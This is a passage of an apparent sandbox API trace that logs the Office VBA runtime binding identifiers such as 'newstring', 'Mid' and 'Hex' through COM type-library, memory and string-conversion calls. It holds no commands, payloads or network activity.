(in: _Dst=0x9653e90, _DstSizeInBytes=0x5, _Src=0x57310ee | out: _Dst=0x9653e90) returned 0x0 [0203.017] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Left") returned 0x10e151 [0203.017] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0203.017] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.017] IUnknown:AddRef (This=0xa121698) returned 0x9 [0203.017] IUnknown:Release (This=0xa121698) returned 0x8 [0203.017] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.017] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.017] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.017] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.017] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.017] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.017] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.017] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.017] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.017] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.017] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.017] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0203.017] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0203.017] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0203.017] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0203.017] IUnknown:Release (This=0xa02b108) returned 0x5 [0203.017] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a035a, cbMultiByte=10, lpWideCharStr=0x1dc590, cchWideChar=11 | out: lpWideCharStr="newstring") returned 10 [0203.017] ITypeComp:RemoteBind (in: This=0xa02b110, szName="newstring", lHashVal=0x102be1, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a035a, cbMultiByte=10, lpWideCharStr=0x1dc5d0, cchWideChar=11 | out: lpWideCharStr="newstring") returned 10 [0203.018] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="newstring", lHashVal=0x102be1, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a035a, cbMultiByte=10, lpWideCharStr=0x1dc5d0, cchWideChar=11 | out: lpWideCharStr="newstring") returned 10 [0203.018] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="newstring", lHashVal=0x102be1, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a035a, cbMultiByte=10, lpWideCharStr=0x1dc5d0, cchWideChar=11 | out: lpWideCharStr="newstring") returned 10 [0203.018] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="newstring", lHashVal=0x102be1, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a035a, cbMultiByte=10, lpWideCharStr=0x1dc5d0, cchWideChar=11 | out: lpWideCharStr="newstring") returned 10 [0203.018] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="newstring", lHashVal=0x102be1, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.018] IMalloc:Alloc (This=0x7fefecb5380, cb=0x11) returned 0x9653e90 [0203.018] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0xa, _Src=0x63a035a | out: _Dst=0x9653e90) returned 0x0 [0203.018] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_newstring") returned 0x1025a5 [0203.018] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0x11, _Src="_B_var_newstring" | out: _Dst="_B_var_newstring") returned 0x0 [0203.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=17, lpWideCharStr=0x1dc530, cchWideChar=17 | out: lpWideCharStr="_B_var_newstring") returned 17 [0203.018] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0203.018] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_newstring", lHashVal=0x1025a5, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.018] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.018] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0203.018] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_newstring", lHashVal=0x1025a5, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.018] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0203.018] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0203.018] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_newstring", lHashVal=0x1025a5, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.018] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0203.018] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0203.018] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_newstring", lHashVal=0x1025a5, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0203.018] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0203.019] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0203.019] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a093e, cbMultiByte=17, lpWideCharStr=0x1dc590, cchWideChar=18 | out: lpWideCharStr="_B_var_newstring") returned 17 [0203.019] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_newstring", lHashVal=0x1025a5, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x6e005f00720061, ppTypeComp=0x74007300000000, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x6e005f00720061, ppTypeComp=0x74007300000000, pDummy=0x0) returned 0x0 [0203.019] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0xa, _Src=0x63a035a | out: _Dst=0x1dc750) returned 0x0 [0203.019] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.019] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9607a00, cb=0x2000) returned 0x98ec860 [0203.019] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0xd, _Src=0x63a0386 | out: _Dst=0x1dc9f0) returned 0x0 [0203.019] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0xc, _Src=0x63a03b6 | out: _Dst=0x1dc9f0) returned 0x0 [0203.019] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x3, _Src=0x63a03e2 | out: _Dst=0x1dc9f0) returned 0x0 [0203.019] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x3, _Src=0x63a0406 | out: _Dst=0x1dc9f0) returned 0x0 [0203.019] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x8, _Src=0x63a042a | out: _Dst=0x1dc9f0) returned 0x0 [0203.019] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x5, _Src=0x63a0452 | out: _Dst=0x1dc9f0) returned 0x0 [0203.019] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.019] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x573133a | out: _Dst=0x9653e90) returned 0x0 [0203.019] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0203.019] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0203.019] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.019] IUnknown:AddRef (This=0xa121698) returned 0x9 [0203.019] IUnknown:Release (This=0xa121698) returned 0x8 [0203.020] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.020] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.020] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.020] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.020] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.020] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.020] IUnknown:Release (This=0x9ab5f00) returned 0xf [0203.020] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.020] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.020] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.020] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.020] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0203.020] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0203.020] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0203.020] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0203.020] IUnknown:Release (This=0xa02b108) returned 0x5 [0203.020] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a047a, cbMultiByte=16, lpWideCharStr=0x1dc590, cchWideChar=17 | out: lpWideCharStr="vbBinaryCompare") returned 16 [0203.020] ITypeComp:RemoteBind (in: This=0xa02b110, szName="vbBinaryCompare", lHashVal=0x109dcc, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a047a, cbMultiByte=16, lpWideCharStr=0x1dc5d0, cchWideChar=17 | out: lpWideCharStr="vbBinaryCompare") returned 16 [0203.020] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="vbBinaryCompare", lHashVal=0x109dcc, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0xa121488, pDescKind=0x1dc59c*=2, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.021] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121488, ppTypeAttr=0x1dc590, pDummy=0xa1caf10 | out: ppTypeAttr=0x1dc590, pDummy=0xa1caf10*=0x0) returned 0x0 [0203.021] ITypeInfo:LocalReleaseTypeAttr (This=0xa121488) returned 0x0 [0203.021] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121488, ppTLib=0x1dc2d0, pIndex=0x0 | out: ppTLib=0x1dc2d0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.021] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc310, pDummy=0x0 | out: ppTLibAttr=0x1dc310, pDummy=0x0) returned 0x0 [0203.021] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.021] IUnknown:Release (This=0x9ab5f00) returned 0x10 [0203.021] IUnknown:AddRef (This=0xa121488) returned 0x3 [0203.021] ITypeInfo:LocalReleaseVarDesc (This=0xa121488) returned 0x0 [0203.021] IUnknown:Release (This=0xa121488) returned 0x2 [0203.021] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc6b8 | out: ppvObject=0x1dc6b8*=0x0) returned 0x80004002 [0203.021] IUnknown:AddRef (This=0xa121488) returned 0x3 [0203.021] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa222320, cb=0x80) returned 0x9c95280 [0203.021] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9bae230, cb=0xa0) returned 0x9778ce0 [0203.021] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc640 | out: ppvObject=0x1dc640*=0x0) returned 0x80004002 [0203.021] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc610 | out: ppvObject=0x1dc610*=0x0) returned 0x80004002 [0203.022] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc600 | out: ppvObject=0x1dc600*=0x0) returned 0x80004002 [0203.022] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc608 | out: ppvObject=0x1dc608*=0x0) returned 0x80004002 [0203.022] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121488, ppTypeAttr=0x1dc638, pDummy=0x10 | out: ppTypeAttr=0x1dc638, pDummy=0x10) returned 0x0 [0203.022] ITypeInfo:LocalReleaseTypeAttr (This=0xa121488) returned 0x0 [0203.022] IUnknown:AddRef (This=0xa121488) returned 0x4 [0203.022] IUnknown:Release (This=0xa121488) returned 0x3 [0203.022] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.022] IUnknown:QueryInterface (in: This=0xa121488, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.022] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x3, _Src=0x63a04aa | out: _Dst=0x1dc9f0) returned 0x0 [0203.022] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.022] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0203.022] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0203.022] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0203.022] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0203.022] IUnknown:Release (This=0xa02b108) returned 0x5 [0203.022] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a04ce, cbMultiByte=4, lpWideCharStr=0x1dc590, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0203.022] ITypeComp:RemoteBind (in: This=0xa02b110, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a04ce, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0203.022] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a04ce, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0203.022] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a04ce, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0203.022] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a04ce, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0203.023] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.023] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.023] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x63a04ce | out: _Dst=0x9653e90) returned 0x0 [0203.025] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0203.025] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xb, _Src="_B_var_Hex" | out: _Dst="_B_var_Hex") returned 0x0 [0203.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpWideCharStr=0x1dc530, cchWideChar=11 | out: lpWideCharStr="_B_var_Hex") returned 11 [0203.025] IUnknown:AddRef (This=0x9ab5f00) returned 0x12 [0203.025] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_Hex", lHashVal=0x1055b0, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=1, pBstrLibName=0x1dc530) returned 0x0 [0203.028] IUnknown:Release (This=0x9ab5f00) returned 0x11 [0203.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Hex", cchWideChar=-1, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Hex", lpUsedDefaultChar=0x0) returned 11 [0203.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0203.028] IUnknown:AddRef (This=0x9ab5f00) returned 0x12 [0203.029] IUnknown:Release (This=0x9ab5f00) returned 0x11 [0203.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0972, cbMultiByte=11, lpWideCharStr=0x1dc590, cchWideChar=12 | out: lpWideCharStr="_B_var_Hex") returned 11 [0203.029] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_Hex", lHashVal=0x1055b0, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0xa1216f0, pDescKind=0x1dc55c*=1, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.033] ITypeInfo:RemoteGetTypeAttr (in: This=0xa1216f0, ppTypeAttr=0x1dc550, pDummy=0x1 | out: ppTypeAttr=0x1dc550, pDummy=0x1) returned 0x0 [0203.033] ITypeInfo:LocalReleaseTypeAttr (This=0xa1216f0) returned 0x0 [0203.034] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 